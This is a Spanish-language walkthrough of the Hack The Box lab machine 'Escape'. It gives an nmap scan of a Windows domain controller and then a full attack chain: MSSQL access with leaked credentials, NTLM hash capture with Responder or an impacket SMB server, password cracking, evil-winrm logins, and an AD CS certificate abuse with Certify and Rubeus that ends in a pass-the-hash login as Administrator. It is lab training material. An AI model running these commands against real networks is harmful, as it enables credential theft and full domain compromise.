Escape
Reconocimiento
# Nmap 7.94SVN scan initiated Sat Oct 5 11:23:59 2024 as: nmap -p135,139,1433,3268,3269,389,445,464,49667,49689,49690,49711,49730,49749,53,593,5985,636,88,9389 -sCV -T5 -oN Taregetd 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-05 23:24:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-10-05T23:05:54
|_Not valid after: 2054-10-05T23:05:54
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
49749/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-05T23:24:57
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Explotación
Empezando enumerando el puerto 445 smb he encontrado un pdf
Dentro del pdf encontramos unas credenciales con las cuales podemos entrar en el puerto 1433 donde corre Microsoft SQL Server 2019
Vamos a utilizar estas credenciales para entrar en la base de datos de la siguiente manera:
impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequel.htbUna vez dentro de la máquina abrimos o un responder con el comando sudo responder -I tun0
o abriendo un smbserver con el comando impacket-smbserver folder . -smb2support
Una vez con este hash lo pasamos por John y encontramos la contraseña para el usuario sql_svc
Con estas credenciales vamos a entrar por evil-winrm a la máquina
evil-winrm -i 10.10.11.202 -u 'sql_svc' -p "REGGIE1234ronnie"Una vez dentor de la máquina nos dirigimos a la ruta
C:\SQLServer\Logsy aquí con el comando type vamos a leer el archivo ERRORLOG.BAK donde vamos a encontrar las credenciales
una vez con estas credenciales entramos por win-rm y vamos con la escalada de privilegios
evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p "NuclearMosquito3"Escalada de Privilegios
Para la escalada de privilegios vamos a utilizar una técnica llamada Certify.exe
Para ello lo primero que tenemos que hacer es descargarnos tanto certify.exe como Rubeus.exe y pasarlo a la máquina víctima
GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHubUna vez con los dos .exe dentro de la máquina víctima vamos a comprobar primero si es vulnerable a esta técnica con el comando
Certify.exe find /vulnerabley encontramos las siguientes templates vulnerable:
ahora ejecutqamos el siguiente comando con el template vulnerable que nos ha salido:
./Certify.exe request /ca:sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administratoresto nos va a crear un par de claves las cuales vamos a copiar y vamos a pegar en un archivo en nuestra maquina el cual vamos a llamar cert.pem, una vez con este archivo creado, ejecutamos el siguiente comando:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxEl certificado que nos crea este comando vamos a subirla a la máquina víctima y vamso a aejecutar el sigueinte comando:
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentialseste comandonos dara el hash NTLM de el usuario administrator
con el cual vamos a poder entrar en el usuario administrator con elvi-winrm y obtener el root.txt
evil-winrm -i 10.10.11.202 -u 'administrator' -H "A52F78E4C751E5F5E17E1E9F3E58F4EE"Última actualización